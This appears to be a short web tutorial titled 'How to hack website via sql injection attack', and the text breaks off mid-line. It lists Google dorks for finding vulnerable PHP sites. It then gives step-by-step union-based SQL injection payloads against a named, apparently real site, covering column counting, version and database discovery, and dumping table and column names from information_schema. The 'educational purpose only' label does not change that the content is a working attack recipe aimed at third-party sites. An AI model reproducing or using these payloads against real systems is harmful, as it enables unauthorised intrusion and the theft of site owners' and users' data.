How to hack website via sql injection attack
[EDUCATIONAL PURPOSE ONLY] USE GOOGLE DORK TO FIND VULNERABLE SITES: Code: “inurl:index.php?catid=” “inurl:news.php?catid=” “inurl:index.php?id=” “inurl:news.php?id=” “inurl:”.php?catid=” site:xxx” INJECTION: wantadsonline.com wantadsonline.com ERROR wantadsonline.com order by 10– [Error: Unknown column ’10’ in ‘order clause’] wantadsonline.com order by 4– [Error: Unknown column ‘4’ in ‘order clause’] wantadsonline.com order by 3– [No Error] FINDING VULNERABLE COLUMN TO PERFORM ATTACK: wantadsonline.com union all select 1,2,3– COLUMN “1” is vulnerable. CHECKING DATABASE VERSION: wantadsonline.com union all select @@version,2,3– CHECKING DATABASE NAME: wantadsonline.com union all select database(),2,3– GETTING TABLE NAMES: wantadsonline.com union all select table_name,2,3 from information_schema.tables– GETTING COLUMNS NAMES: wantadsonline.com union all select column_name,2,3 from information_schema.columns– GETTING COLUMNS NAMES FROM A CERTAIN TABLE: METHOD 1: [CONVERTING TABLE NAME TO HEX] [WEBSITE:www.string-functions.com [wantadsonline.com union all select column_name,2,3 from information_schema.columns WHERE table_name=0xhex value–] AFTER PUTTING HEX VALUE: wantadsonline.com union all select column_name,2,3 from information_schema.columns WHERE table_name=0x75736572– METHOD 2: [CONVERTING TABLE NAME TO ASCII] [WEBSITE:getyourwebsitehere.com wantadsonline.com union all select column_name,2,3 from information_schema.columns WHERE table_name=char(ASCII VALUE …